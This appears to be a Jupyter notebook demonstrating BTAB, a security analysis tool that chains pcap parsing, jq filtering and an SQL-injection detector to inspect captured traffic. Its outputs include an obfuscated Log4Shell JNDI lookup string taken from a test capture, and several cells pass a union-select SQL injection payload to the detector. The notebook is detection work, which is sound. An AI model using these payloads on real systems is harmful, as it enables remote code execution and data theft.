In [82]:
# ---------------------------------
# 初始化
# ---------------------------------
import json

# 加载 gRPC 模块接口
from btab import BTAB, Engines, Search

# 初始化系统
btabIns = BTAB()
if btabIns.Ping().Type == "success":
    print("连接成功")

# 检查所有可用引擎
eg = Engines()
if eg.CheckAlive().Type == "success":
    print("检查完成")

连接成功
检查完成


In [38]:

# 初始化查询
# 设置连接设备
search = Search()

# ====================================
# 使用 pcap 模块
# ====================================

# 进行查询
content = """
// 拉取数据
| pcap
|: file log4j_test.pcap
|: fields ["ip.src", "tcp.srcport", "ip.dst", "tcp.dstport","text"]
|: condition http
"""
result1 = search.Submit(content)
# print(result1)
# print(result1.Result)
results = json.loads(result1.Result)
len(results)

2

In [42]:
# 进行查询
content = """
// 拉取数据
| pcap
|: file log4j_test.pcap
"""
result2 = search.Submit(content)
# print(result2.Result)
results = json.loads(result2.Result)
len(results)

1971

In [44]:
# ====================================
# 使用 jq 模块
# ====================================

content = """
| jq
|: filter .foo.bar
|: content { "foo": { "bar": { "baz": 123 } } , "boo":"123"}
"""
result3 = search.Submit(content)
print(result3.Result)

{"baz":123}


In [48]:
# ====================================
# 多引擎模块组合
# ====================================

# 进行查询
content = """
// 拉取数据
| pcap
|: file log4j_test.pcap
|: fields ["ip.src", "tcp.srcport", "ip.dst", "tcp.dstport","text"]
|: condition http
| jq
|: filter .[0] | .text[-1:]
|: content {{R}}
"""
result4 = search.Submit(content)
# print(result4.Result)
json.loads(result4.Result)

['Form item: "a" = "${jndi:ld${:gfdsghsfdhsdfh:-a}p://127.0.0.1:1111/f${lower:s}ad}"']

In [49]:
# ====================================
# 调用引擎模块
# ====================================

# 进行查询
content = """
| sqli
|: content ' union select concat(md5(2001427499))#
"""
result5 = search.Submit(content)
# print(result5.Result)
json.loads(result5.Result)

{'code': 20000,
 'message': '发现sql注入',
 'result': "检测到SQL注入,内容为【' union select concat(md5(2001427499))#】, 词法为：【sUEf(】",
 'type': 'success'}

In [65]:

content = """
// 拉取数据
| pcap
|: file sqlinjection_9.pcap
|: fields ["http.request.uri"]
|: condition http

// 处理 json 获取 uri
| jq
|: filter .[].["http.request.uri"][0]
|: content {{R}}

// 调用 sql注入检测引擎检测
| sqli
|: content {{R}}
"""
result6 = search.Submit(content)
# print(result6.Result)
json.loads(result6.Result)

{'code': 40400,
 'message': '未检测到sql注入',
 'result': '未发现SQL注入 false \n',
 'type': 'success'}

In [87]:
# ====================================
# 多流管道示例
# ====================================

content = """
: a  ' union select concat(md5(2001427499))#
: b { "foo": { "bar": { "baz": 123 } } , "boo":"123"}
: c { "foo": { "bar": { "baz": "' union select concat(md5(2001427499))#" } } , "boo":"123"}

| jq
|: filter .foo.bar
|: content {{c}}

| jq
|: filter .foo.bar
|: content {{b}}

| jq
|: filter .baz
|: content {{R[0]}}


| sqli
|: content {{R}}

"""
result7 = search.Submit(content)
# print(result7.Result)
json.loads(result7.Result)

{'code': 20000,
 'message': '发现sql注入',
 'result': "检测到SQL注入,内容为【' union select concat(md5(2001427499))#】, 词法为：【sUEf(】",
 'type': 'success'}